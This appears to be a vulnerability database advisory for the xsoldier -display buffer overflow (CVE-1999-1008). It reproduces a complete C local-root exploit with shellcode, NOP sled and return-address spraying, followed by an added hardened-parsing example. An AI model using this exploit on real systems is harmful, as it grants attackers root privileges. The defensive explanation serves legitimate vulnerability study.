FreeBSD and Linux Mandrake 'xsoldier' Buffer Overflow Vulnerability

Vulnerability ID: 1105839    Vulnerability type: Boundary condition error
Published: 2000-05-17    Updated: 2005-05-02
CVE ID: CVE-1999-1008
CNNVD ID: CNNVD-200005-069
Platform: Linux    CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/19677
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-069
|Vulnerability details
The xsoldier program contains a buffer overflow. A local user can gain root privileges by passing it an over-long argument.
|Exploit
/*
source: http://www.securityfocus.com/bid/871/info
 
Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console.
 
The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string.
 
The user does not have to have a valid $DISPLAY to exploit this.
*/

/*Larry W. Cashdollar linux xsoldier exploit.
 *[email protected] http://vapid.dhs.org
 *if xsoldier is built and installed from its source it will be installed
 *setuid root in /usr/local/games
 *original exploit found by brock tellier for freebsd 3.3 ports packages.
 *If a setregid() call is placed in the shellcode, you can get egid=12
 *with the default mandrake installation.*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>		/* strlen, memcpy */
#include <unistd.h>		/* execl */

#define NOP 0x90		/*no operation skip to next instruction. */
#define LEN 4480			/*our buffersize. */


char shellcode[] =		/*execve with setreuid(0,0) and no '/' hellkit v1.1 */
  "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
  "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
  "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
  "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
  "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
  "\xc2\x91";


/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp (void)
{
  long sp;
  /* i386 only: read the current stack pointer into a C variable. */
  __asm__ ("movl %%esp, %0" : "=r" (sp));
  return sp;
}

int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i, offset;
  long retaddr = get_sp ();

  if (argc <= 1)
    offset = 0;
  else
    offset = atoi (argv[1]);

/*#Copy the NOPs  in to the buffer leaving space for shellcode and
  #pointers*/

  for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
    *(buffer + i) = NOP;

/*[NNNNNNNNNNNNNNNNNNNNN                            ]*/
/*                      ^-- LEN -(strlen(shellcode)) - 35*/
/*#Copy the shell code into the buffer*/

  memcpy (buffer + i, shellcode, strlen (shellcode));

/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS            ]*/
/*                      ^-(buffer+i)                 */
/*#Fill the buffer with our new address to jump to esp + offset */

  for (i = i + strlen (shellcode); i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr+offset;

/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/
/*                                      ^-(i+strlen(shellcode))*/

  printf ("Jumping to address %lx BufSize %d\n", retaddr + offset, LEN);
  execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, (char *) NULL);
  perror ("execl");		/* only reached if the target binary could not be started */
  return 1;
}
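The bug class the advisory describes is an unchecked copy of the -display argument into a fixed-size buffer inside a setuid-root program. The following is an added example written for this page, not xsoldier's source and not the exploit author's code: it shows that pattern next to a bounds-checked, syntax-validated replacement. The buffer size DISPLAY_MAX, the function names and the accepted display-name syntax are assumptions chosen to illustrate the point; only the option name and the 4480-byte argument size come from the page.

```c
/* Added example, not xsoldier's source: the unchecked-copy pattern from the
 * advisory next to a bounds-checked, validated version.  DISPLAY_MAX, the
 * function names and the syntax rules are assumptions for illustration. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DISPLAY_MAX 256   /* assumed size of the fixed stack buffer */

/* The vulnerable shape: strcpy() of a caller-controlled argument into a
 * fixed-size buffer with no length check.  An argument of DISPLAY_MAX bytes
 * or more writes past the end of `out`, which is what the exploit above
 * relies on.  Shown for contrast only. */
static void parse_display_unsafe(const char *arg, char out[DISPLAY_MAX])
{
  strcpy(out, arg);
}

/* Hardened form: refuse anything that does not fit, and accept only the
 * host:display[.screen] shape an X display name is expected to have.
 * Returns 0 and fills `out` on success, -1 on an over-long or malformed
 * argument (leaving `out` untouched). */
int parse_display_safe(const char *arg, char *out, size_t outsz)
{
  size_t n = strlen(arg);
  const char *colon;
  const char *p;

  if (n == 0 || n >= outsz)           /* must leave room for the NUL */
    return -1;
  colon = strchr(arg, ':');
  if (colon == NULL || !isdigit((unsigned char) colon[1]))
    return -1;                        /* a display number must follow ':' */
  for (p = arg; *p != '\0'; p++) {
    if (!isalnum((unsigned char) *p) && strchr(":.-_", *p) == NULL)
      return -1;                      /* reject shell/format metacharacters */
  }
  memcpy(out, arg, n + 1);
  return 0;
}

int main(void)
{
  char out[DISPLAY_MAX];
  char big[4480 + 1];                 /* same argument size the exploit above builds */
  const char *ok = "localhost:0.0";

  memset(big, 'A', sizeof big - 1);   /* constructed over-long argument */
  big[sizeof big - 1] = '\0';

  printf("%-16s -> %d\n", ok, parse_display_safe(ok, out, sizeof out));
  printf("%zu x 'A'       -> %d\n", sizeof big - 1,
         parse_display_safe(big, out, sizeof out));

  parse_display_unsafe(ok, out);      /* harmless for a short argument... */
  /* ...but parse_display_unsafe(big, out) would write 4480 bytes into a
   * 256-byte buffer, which is exactly the overflow the advisory describes. */
  return 0;
}
```

Two things make the safe version robust rather than merely shorter: the length test compares against the destination size the caller passes (so it cannot drift out of sync with the buffer declaration), and the syntax check rejects the argument before any copy happens. In a setuid-root program the remaining mitigation is ordering: drop privileges with setuid(getuid()) before touching argv at all, so that a parsing bug cannot be turned into a root shell.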
|References

Source: BID
Name: 871
Link: http://www.securityfocus.com/bid/871
Source: marc.theaimsgroup.com
Link: http://marc.theaimsgroup.com/?l=freebsd-security&m=94531826621620&w=2
